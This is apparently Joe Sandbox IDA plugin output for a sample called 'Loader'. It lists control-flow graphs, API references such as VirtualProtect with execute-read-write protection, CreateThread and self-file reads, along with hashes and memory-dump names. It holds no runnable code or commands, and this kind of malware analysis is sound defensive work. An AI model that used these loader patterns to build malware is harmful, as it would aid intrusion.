                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                  • API String ID: 3664257935-537541572
                                                                                                  • Opcode ID: 5b303bd13b3eab0dc19e34b9bd4e972680ab6d6bcc8e5fa19373778bd64c5abb
                                                                                                  • Instruction ID: 50e4c0312ccbe0be5f2c6e192723abfd401000311d5db4a982b8b861695c0767
                                                                                                  • Opcode Fuzzy Hash: 5b303bd13b3eab0dc19e34b9bd4e972680ab6d6bcc8e5fa19373778bd64c5abb
                                                                                                  • Instruction Fuzzy Hash: E4210531B03310ABC7359B72FC51A6A33AC9B81B61F250610E955A72D0DB30ED02DBD1

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 124 921800-92189b call 939d20 127 9218b6-9218bb 124->127 128 92189d-9218b3 124->128 129 9218cb-9218d1 127->129 130 9218bd-9218c6 127->130 128->127 133 9218d3-9218d5 129->133 134 921901-921905 129->134 132 921c19-921c3c 130->132 137 921c94-921cf8 call 9230a0 call 923460 call 9306fc 132->137 138 921c3e-921c45 call 92d838 132->138 133->134 135 9218d7-9218f9 call 922df0 133->135 136 921908-921948 call 924600 134->136 135->132 149 9218ff 135->149 161 92197a-921990 136->161 162 92194a-921964 136->162 137->132 147 921c47-921c4a call 923a80 138->147 148 921c4f-921c5d 138->148 147->148 153 921c81-921c93 148->153 154 921c5f-921c7e 148->154 149->136 154->153 164 921996-9219a5 161->164 165 921a69 161->165 162->161 178 921966-921976 162->178 167 921a6b-921a71 164->167 168 9219ab 164->168 165->167 170 921aaf-921ab3 167->170 169 9219b0-9219c4 168->169 171 9219f0-921a15 169->171 172 9219c6-9219cd 169->172 173 921b42-921b46 170->173 174 921ab9-921ac1 170->174 182 921a18-921a22 171->182 172->171 176 9219cf-9219df 172->176 179 921c04-921c11 173->179 180 921b4c-921b56 173->180 174->173 177 921ac3-921b09 174->177 176->182 199 921b0b-921b12 177->199 200 921b18-921b39 call 92dfe0 177->200 178->161 179->132 180->179 181 921b5c 180->181 184 921b60-921b74 181->184 186 921a24-921a42 182->186 187 921a5a-921a62 182->187 189 921ba0-921bcc 184->189 190 921b76-921b7d 184->190 186->169 192 921a48-921a58 186->192 193 921a65-921a67 187->193 197 921bce-921bf7 189->197 201 921bff 189->201 190->189 194 921b7f-921b93 190->194 192->193 193->167 196 921b95 194->196 194->197 196->201 197->184 203 921bfd 197->203 199->200 202 921a80-921a8d 199->202 207 921b3b-921b3d 200->207 201->179 204 921a90-921aac 202->204 203->179 204->170 207->204
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strlen
                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                  • API String ID: 4218353326-1866435925
                                                                                                  • Opcode ID: eb509b6ee76d7b83b0697b616aeb3f2a6890265f973696f7d4e8c44fe67d2607
                                                                                                  • Instruction ID: fe52d2f7c0029f8ae4088de26fa664af2f4dcdfe965cf71f1a782190cebdd4a0
                                                                                                  • Opcode Fuzzy Hash: eb509b6ee76d7b83b0697b616aeb3f2a6890265f973696f7d4e8c44fe67d2607
                                                                                                  • Instruction Fuzzy Hash: 05F17E75A012248FCB14CF68D494BADBBF1FF88324F198259E855AB3A5C734ED41CB90

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 209 935439-935444 210 935446-935459 call 9377d4 call 937ebf 209->210 211 93545a-93546d call 9354ca 209->211 217 93549b 211->217 218 93546f-93548c CreateThread 211->218 219 93549d-9354a9 call 93551a 217->219 221 9354aa-9354af 218->221 222 93548e-93549a GetLastError call 9377fa 218->222 225 9354b1-9354b4 221->225 226 9354b6-9354ba 221->226 222->217 225->226 226->219
                                                                                                  APIs
                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00015560,00000000,00000000,00000000), ref: 00935482
                                                                                                  • GetLastError.KERNEL32(?,?,?,009225BB,00000000,00000000), ref: 0093548E
                                                                                                  • __dosmaperr.LIBCMT ref: 00935495
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                                  • String ID:
                                                                                                  • API String ID: 2744730728-0
                                                                                                  • Opcode ID: 155a44b18db64dd788c126cbbf91bfaced594925ea39d10c6dd59595fde6048b
                                                                                                  • Instruction ID: 8b0cd428bbc53137abfaff9b3bfd13f688f3b508f1e39d5a184623e293c67241
                                                                                                  • Opcode Fuzzy Hash: 155a44b18db64dd788c126cbbf91bfaced594925ea39d10c6dd59595fde6048b
                                                                                                  • Instruction Fuzzy Hash: 9601B172504619AFCF19DFE1DC0AAAE7BA9EF48322F014058FC01921A0EB30DE40DF90

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 229 9355de-9355eb call 93c3ab 232 93562b-93562e ExitThread 229->232 233 9355ed-9355f5 229->233 233->232 234 9355f7-9355fb 233->234 235 935602-935608 234->235 236 9355fd call 93cf0b 234->236 238 935615-93561b 235->238 239 93560a-93560c 235->239 236->235 238->232 241 93561d-93561f 238->241 239->238 240 93560e-93560f CloseHandle 239->240 240->238 241->232 242 935621-935625 FreeLibraryAndExitThread 241->242 242->232
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C3AB: GetLastError.KERNEL32(00000000,?,009377D9,0093D3F6,?,?,0093C2A7,00000001,00000364,?,00000003,000000FF,?,00935585,00958E90,0000000C), ref: 0093C3AF
                                                                                                    • Part of subcall function 0093C3AB: SetLastError.KERNEL32(00000000), ref: 0093C451
                                                                                                  • CloseHandle.KERNEL32(?,?,?,009354C9,?,?,009355BE,00000000), ref: 0093560F
                                                                                                  • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,009354C9,?,?,009355BE,00000000), ref: 00935625
                                                                                                  • ExitThread.KERNEL32 ref: 0093562E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 1991824761-0
                                                                                                  • Opcode ID: ecc1b466caba132ccf4041fcc98f9fd5e008f6b1af11220559d761b68faa794e
                                                                                                  • Instruction ID: e0f1c2116a99e3624433a57b77edd4ec4c9054f858c5e9baa7e2a39fec9c504e
                                                                                                  • Opcode Fuzzy Hash: ecc1b466caba132ccf4041fcc98f9fd5e008f6b1af11220559d761b68faa794e
                                                                                                  • Instruction Fuzzy Hash: CDF05E70514F006BCB212B25C94AA1A7B9DEF09328F8A4614F9A5D31B0DB30ED41CF50

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000002,?,00935811,00938486,00938486,?,00000002,F84A4DD6,00938486,00000002), ref: 00935760
                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00935811,00938486,00938486,?,00000002,F84A4DD6,00938486,00000002), ref: 00935767
                                                                                                  • ExitProcess.KERNEL32 ref: 00935779
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  • Opcode ID: 6c30a243fac9c9349591cbda201ed68257eab32d9d78787153936265654c362d
                                                                                                  • Instruction ID: 7b26b076586ba166e21a113a1f6cece76736bd39574aad84dafba67caaf29ba7
                                                                                                  • Opcode Fuzzy Hash: 6c30a243fac9c9349591cbda201ed68257eab32d9d78787153936265654c362d
                                                                                                  • Instruction Fuzzy Hash: BDD09E31014604AFCF513F62DC0D9593F2AEF89352B858018B9495A171DF329951EF80

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 350 943ce4-943d06 351 943d0c-943d0e 350->351 352 943ef9 350->352 353 943d10-943d2f call 938068 351->353 354 943d3a-943d5d 351->354 355 943efb-943eff 352->355 361 943d32-943d35 353->361 357 943d63-943d69 354->357 358 943d5f-943d61 354->358 357->353 360 943d6b-943d7c 357->360 358->357 358->360 362 943d7e-943d8c call 942a92 360->362 363 943d8f-943d9f call 944011 360->363 361->355 362->363 368 943da1-943da7 363->368 369 943de8-943dfa 363->369 370 943dd0-943de6 call 94408e 368->370 371 943da9-943dac 368->371 372 943e51-943e71 WriteFile 369->372 373 943dfc-943e02 369->373 391 943dc9-943dcb 370->391 374 943db7-943dc6 call 944455 371->374 375 943dae-943db1 371->375 377 943e73-943e79 GetLastError 372->377 378 943e7c 372->378 379 943e04-943e07 373->379 380 943e3d-943e4a call 9444bd 373->380 374->391 375->374 381 943e91-943e94 375->381 377->378 385 943e7f-943e8a 378->385 386 943e29-943e3b call 944681 379->386 387 943e09-943e0c 379->387 390 943e4f 380->390 394 943e97-943e99 381->394 392 943ef4-943ef7 385->392 393 943e8c-943e8f 385->393 397 943e24-943e27 386->397 387->394 395 943e12-943e1f call 944598 387->395 390->397 391->385 392->355 393->381 398 943ec7-943ed3 394->398 399 943e9b-943ea0 394->399 395->397 397->391 401 943ed5-943edb 398->401 402 943edd-943eef 398->402 403 943ea2-943eb4 399->403 404 943eb9-943ec2 call 937860 399->404 401->352 401->402 402->361 403->361 404->361
                                                                                                  APIs
                                                                                                    • Part of subcall function 0094408E: GetConsoleOutputCP.KERNEL32(F84A4DD6,00000000,00000000,?), ref: 009440F1
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00938674,?), ref: 00943E69
                                                                                                  • GetLastError.KERNEL32(?,?,00938674,?,009388B8,00000000,?,00000000,009388B8,?,?,?,00959040,0000002C,009387A4,?), ref: 00943E73
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 2915228174-0
                                                                                                  • Opcode ID: 1e4acb6ad359a0aa1667c4f04ba3e35b7ba02480c21f0597cd1bbb49ed3d31c0
                                                                                                  • Instruction ID: 838f8097d48eb42d257acc71b83a4ca3263dfbcc24d53fcfc39d89ab2ff88992
                                                                                                  • Opcode Fuzzy Hash: 1e4acb6ad359a0aa1667c4f04ba3e35b7ba02480c21f0597cd1bbb49ed3d31c0
                                                                                                  • Instruction Fuzzy Hash: A661AFB1D04259AFDF11CFB9C884EEFBBB9AF49304F148545E904A7292D736DA01CB60

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 407 9444bd-944512 call 930140 410 944514 407->410 411 944587-944597 call 92a881 407->411 412 94451a 410->412 414 944520-944522 412->414 416 944524-944529 414->416 417 94453c-944561 WriteFile 414->417 418 944532-94453a 416->418 419 94452b-944531 416->419 420 944563-94456e 417->420 421 94457f-944585 GetLastError 417->421 418->414 418->417 419->418 420->411 422 944570-94457b 420->422 421->411 422->412 423 94457d 422->423 423->411
                                                                                                  APIs
                                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00943E4F,00000000,009388B8,?,00000000,?,00000000), ref: 00944559
                                                                                                  • GetLastError.KERNEL32(?,00943E4F,00000000,009388B8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00938674), ref: 0094457F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 442123175-0
                                                                                                  • Opcode ID: 2b1142a417b800e15fc0c7b8a036bc796b0fbae811ec137394d6b3f446565b80
                                                                                                  • Instruction ID: eab4d3aeb4f78a7635ebe92b70cd132a240d9431c9c1bec5a9a2dd24983acd00
                                                                                                  • Opcode Fuzzy Hash: 2b1142a417b800e15fc0c7b8a036bc796b0fbae811ec137394d6b3f446565b80
                                                                                                  • Instruction Fuzzy Hash: AC217175A002199FCF15CF2ADC80AEDB7B9EB48305F1440AAF946D7251DA30DD46CF65

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 424 929290-9292d0 call 92f0b1 427 9292d6-9292dd 424->427 428 929367-929369 call 92b47e 424->428 429 9292e3-9292e9 427->429 430 92936e-92937f call 92b47e 427->430 428->430 432 929314-92933a call 92f0c2 call 929490 429->432 433 9292eb-929312 call 92f0c2 429->433 440 92933f-929351 call 92a800 430->440 432->440 443 929356-929366 433->443 440->443
                                                                                                  APIs
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929369
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929377
                                                                                                    • Part of subcall function 0092F0C2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00928FEA,0092A490), ref: 0092F0D7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 3666349979-0
                                                                                                  • Opcode ID: 3bd5c3ccdbf5dd071c00f84317bb2b7f1b7462e91819ef709c4f71a7b02c3f66
                                                                                                  • Instruction ID: e26930757824ca47739723685bc64c1ce1bcbf1774bd154a89db4106088bb7f4
                                                                                                  • Opcode Fuzzy Hash: 3bd5c3ccdbf5dd071c00f84317bb2b7f1b7462e91819ef709c4f71a7b02c3f66
                                                                                                  • Instruction Fuzzy Hash: AB2124B1A00625DBDB10EF64E8427AEBBB4FF48320F104228E4296B3C5D334A905CBD6

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 446 93db42-93db47 447 93db49-93db61 446->447 448 93db63-93db67 447->448 449 93db6f-93db78 447->449 448->449 450 93db69-93db6d 448->450 451 93db8a 449->451 452 93db7a-93db7d 449->452 453 93dbe4-93dbe8 450->453 456 93db8c-93db99 GetStdHandle 451->456 454 93db86-93db88 452->454 455 93db7f-93db84 452->455 453->447 457 93dbee-93dbf1 453->457 454->456 455->456 458 93dbc6-93dbd8 456->458 459 93db9b-93db9d 456->459 458->453 461 93dbda-93dbdd 458->461 459->458 460 93db9f-93dba8 GetFileType 459->460 460->458 462 93dbaa-93dbb3 460->462 461->453 463 93dbb5-93dbb9 462->463 464 93dbbb-93dbbe 462->464 463->453 464->453 465 93dbc0-93dbc4 464->465 465->453
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,0093DA31,00959388,0000000C), ref: 0093DB8E
                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,0093DA31,00959388,0000000C), ref: 0093DBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileHandleType
                                                                                                  • String ID:
                                                                                                  • API String ID: 3000768030-0
                                                                                                  • Opcode ID: eb643ede6a30c20c17f807f7a0f114194f5416c780365c59f790be8608bb6f1f
                                                                                                  • Instruction ID: 25d3c94bae58327596af8ac081731767e8761d50fad5c795e9640e8f18c23e89
                                                                                                  • Opcode Fuzzy Hash: eb643ede6a30c20c17f807f7a0f114194f5416c780365c59f790be8608bb6f1f
                                                                                                  • Instruction Fuzzy Hash: 1811B9715097514AC7304E3FBCA8A22FAB9A756330F3A0B1AD1B6875F1C634DD86DA40

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 00921240: _strlen.LIBCMT ref: 009212BA
                                                                                                  • FreeConsole.KERNELBASE(?,?,?,?,?,009217EF,?,?,?,00000000,?), ref: 00921FD1
                                                                                                  • VirtualProtect.KERNELBASE(0095A011,00000549,00000040,?), ref: 00922028
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleFreeProtectVirtual_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1248733679-0
                                                                                                  • Opcode ID: 3c26d54ae6a858bea7836b9de89f66bd4faf8e2c65ea1256c55a534e9650d294
                                                                                                  • Instruction ID: 0daf6215444a9aaeb254be43b40682784e376b3da7a7f9026a0856d9c09d70fe
                                                                                                  • Opcode Fuzzy Hash: 3c26d54ae6a858bea7836b9de89f66bd4faf8e2c65ea1256c55a534e9650d294
                                                                                                  • Instruction Fuzzy Hash: FC110671E10218BBDB04ABA6AC03FFF77A4EFD5715F404028F905A72C2EA71695487D5
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(00958E90,0000000C), ref: 00935573
                                                                                                  • ExitThread.KERNEL32 ref: 0093557A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorExitLastThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1611280651-0
                                                                                                  • Opcode ID: b91f960745d6f0094894ada227210303cb84e914138394cc0320fdc51d0c94da
                                                                                                  • Instruction ID: d14a9a9778781219591779a49630bf49e5be7139161082617fd003a0c6381498
                                                                                                  • Opcode Fuzzy Hash: b91f960745d6f0094894ada227210303cb84e914138394cc0320fdc51d0c94da
                                                                                                  • Instruction Fuzzy Hash: D4F0AF71A406049FDB15ABB0C81AB6E3B75EF84702F204158F015A7262CB34A9419FA1
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00922338
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0092234C
                                                                                                    • Part of subcall function 00922060: CreateFileA.KERNELBASE ref: 009220E6
                                                                                                    • Part of subcall function 00922060: GetFileSize.KERNEL32(00000000,00000000), ref: 009220F6
                                                                                                    • Part of subcall function 00922060: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0092211B
                                                                                                    • Part of subcall function 00922060: CloseHandle.KERNELBASE(00000000), ref: 0092212A
                                                                                                    • Part of subcall function 00922060: _strlen.LIBCMT ref: 0092217D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
